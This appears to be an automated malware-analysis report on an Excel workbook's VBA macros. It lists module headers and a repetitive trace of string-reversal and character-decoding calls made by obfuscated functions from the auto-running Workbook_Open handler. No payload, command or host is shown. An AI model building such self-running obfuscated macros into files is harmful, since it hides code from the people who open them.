Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Non-Executed Functions

Subroutine asdasdcanscsk, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
2	Sub asdasdcanscsk()
4	End Sub

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Workbook_Open, APIs: 1065, Strings: 55, Number of lines: 18, Relevance: 2246.018

APIs	Meta Information
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse	StrReverse("3:") -> :3 StrReverse("3") -> 3
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: Chr
Part of subcall function QhnsRALDv@ThisWorkbook: Asc
Part of subcall function QhnsRALDv@ThisWorkbook: Mid
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
Part of subcall function QhnsRALDv@ThisWorkbook: StrReverse
StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Len
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: Mid
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: StrReverse
Part of subcall function SN2APmbS0@ThisWorkbook: DoEvents
Part of subcall function DZfiJRzM5@ThisWorkbook: Len
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Chr$
Part of subcall function DZfiJRzM5@ThisWorkbook: Val
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: Mid$
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function DZfiJRzM5@ThisWorkbook: StrReverse
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function QhnsRALDv@ThisWorkbook: Len
